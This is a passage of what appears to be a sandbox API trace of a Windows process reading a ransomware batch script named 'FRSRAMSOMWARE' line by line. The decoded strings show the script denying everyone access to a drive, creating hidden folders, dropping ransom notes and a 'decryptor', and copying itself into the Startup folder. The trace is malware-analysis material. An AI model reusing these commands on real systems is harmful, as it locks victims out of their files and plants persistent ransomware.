lpDistanceToMoveHigh=0x0) returned 0x51b [0114.945] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.945] GetFileType (hFile=0x158) returned 0x1 [0114.945] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0114.945] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.945] SetFilePointer (in: hFile=0x158, lDistanceToMove=1315, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0114.945] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 3\r\nacls \"F:\\*.*\" /e /d everyone\r\n") returned 8 [0114.945] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0114.945] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.945] GetFileType (hFile=0x158) returned 0x1 [0114.945] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0114.946] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.946] SetFilePointer (in: hFile=0x158, lDistanceToMove=1317, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0114.946] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 3\r\n") returned 2 [0114.946] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0114.946] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.946] GetFileType (hFile=0x158) returned 0x1 [0114.946] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0114.946] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.946] SetFilePointer (in: hFile=0x158, lDistanceToMove=1321, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0114.946] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":3\r\n 3\r\n") returned 4 [0114.946] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0114.946] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.946] GetFileType (hFile=0x158) returned 0x1 [0114.946] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0114.946] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.946] SetFilePointer (in: hFile=0x158, lDistanceToMove=1342, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0114.946] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRSRAMSOMWARE\r\n /e /d everyone\r\n") returned 21 [0114.946] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0114.946] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.946] GetFileType (hFile=0x158) returned 0x1 [0114.946] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0114.946] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.946] SetFilePointer (in: hFile=0x158, lDistanceToMove=1379, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0114.946] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRSRAMSOMWARE\r\n\n") returned 37 [0114.946] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0114.946] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.946] GetFileType (hFile=0x158) returned 0x1 [0114.946] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0114.946] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.947] SetFilePointer (in: hFile=0x158, lDistanceToMove=1395, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0114.947] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=16, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRS_TEMP\r\n+r C:\\FRSRAMSOMWARE\r\n") returned 16 [0114.947] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0114.947] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.947] GetFileType (hFile=0x158) returned 0x1 [0114.947] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0114.947] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.947] SetFilePointer (in: hFile=0x158, lDistanceToMove=1427, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0114.947] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRS_TEMP\r\nARE\r\n") returned 32 [0114.947] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0114.947] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.947] GetFileType (hFile=0x158) returned 0x1 [0114.947] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0114.947] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.947] SetFilePointer (in: hFile=0x158, lDistanceToMove=1462, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0114.947] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo.encrypt>C:\\FRS_TEMP\\temp.txt\r\n\r\n") returned 35 [0114.947] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0114.947] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.947] GetFileType (hFile=0x158) returned 0x1 [0114.947] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0114.947] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.947] SetFilePointer (in: hFile=0x158, lDistanceToMove=1542, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0114.947] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=80, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\Users\\%username%\\Desktop\\FRS_Decryptor.exe\r\npng\r\n") returned 80 [0114.947] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0114.947] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.947] GetFileType (hFile=0x158) returned 0x1 [0114.947] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0114.947] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.947] SetFilePointer (in: hFile=0x158, lDistanceToMove=1626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0114.947] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.png\r\n\n") returned 84 [0114.947] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0114.948] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.948] GetFileType (hFile=0x158) returned 0x1 [0114.948] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0114.948] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.948] SetFilePointer (in: hFile=0x158, lDistanceToMove=1710, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0114.948] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.txt\r\n") returned 84 [0114.948] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0114.948] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.948] GetFileType (hFile=0x158) returned 0x1 [0114.948] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0114.948] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.948] SetFilePointer (in: hFile=0x158, lDistanceToMove=1806, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0114.948] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=96, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n\n") returned 96 [0114.948] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0114.948] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.948] GetFileType (hFile=0x158) returned 0x1 [0114.948] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0114.948] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.948] SetFilePointer (in: hFile=0x158, lDistanceToMove=1840, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0114.948] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=34, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 C:\\FRSRAMSOMWARE\\FRS.exe\r\nag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n") returned 34 [0114.948] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0114.948] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.948] GetFileType (hFile=0x158) returned 0x1 [0114.948] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0114.948] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.948] SetFilePointer (in: hFile=0x158, lDistanceToMove=1937, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0114.948] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=97, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 \"C:\\Users\\FIFCOM\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\FRS.exe\"\r\n") returned 97 [0114.948] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0114.949] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.949] GetFileType (hFile=0x158) returned 0x1 [0114.949] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0114.949] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.949] SetFilePointer (in: hFile=0x158, lDistanceToMove=2006, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0114.949] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=69, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe\r\n\\Programs\\Startup\\FRS.exe\"\r\n") returned 69 [0114.949] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0114.949] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.949] GetFileType (hFile=0x158) returned 0x1 [0114.949] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0114.949] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.949] SetFilePointer (in: hFile=0x158, lDistanceToMove=2079, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0114.949] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png\r\ngrams\\Startup\\FRS.exe\"\r\n") returned 73 [0114.949] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0114.949] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.949] GetFileType (hFile=0x158) returned 0x1 [0114.949] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0114.949] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.949] SetFilePointer (in: hFile=0x158, lDistanceToMove=2152, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0114.949] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt\r\n") returned 73 [0114.949] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0114.949] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.949] GetFileType (hFile=0x158) returned 0x1 [0114.949] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0114.949] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0114.949] SetFilePointer (in: hFile=0x158, lDistanceToMove=2237, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0114.949] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=85, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 85 [0114.949] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0114.949] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.950] GetFileType (hFile=0x158) returned 0x1 [0114.950] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0114.950] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x1b1, lpOverlapped=0x0) returned 1 [0114.950] SetFilePointer (in: hFile=0x158, lDistanceToMove=2280, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0114.950] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=43, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\Chinese_national_flag.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\n") returned 43 [0114.950] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0114.950] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.950] GetFileType (hFile=0x158) returned 0x1 [0114.950] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0114.950] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x186, lpOverlapped=0x0) returned 1 [0114.950] SetFilePointer (in: hFile=0x158, lDistanceToMove=2302, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0114.950] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\ne_national_flag.png\r\n") returned 22 [0114.950] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0114.950] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.950] GetFileType (hFile=0x158) returned 0x1 [0114.950] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0114.950] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x170, lpOverlapped=0x0) returned 1 [0114.950] SetFilePointer (in: hFile=0x158, lDistanceToMove=2339, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0114.950] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.txt\r\n.png\r\n") returned 37 [0114.950] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0114.950] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.950] GetFileType (hFile=0x158) returned 0x1 [0114.950] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0114.950] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x14b, lpOverlapped=0x0) returned 1 [0114.950] SetFilePointer (in: hFile=0x158, lDistanceToMove=2361, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0114.950] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.txt\r\n") returned 22 [0114.950] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0114.950] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.950] GetFileType (hFile=0x158) returned 0x1 [0114.950] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0114.950] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x135, lpOverlapped=0x0) returned 1 [0114.951] SetFilePointer (in: hFile=0x158, lDistanceToMove=2383, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0114.951] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="taskkill notepad.exe\r\n") returned 22 [0114.951] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0114.951] _get_osfhandle (_FileHandle=3) returned 0x158 [0114.951] GetFileType (hFile=0x158) returned 0x1 [0114.951] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, 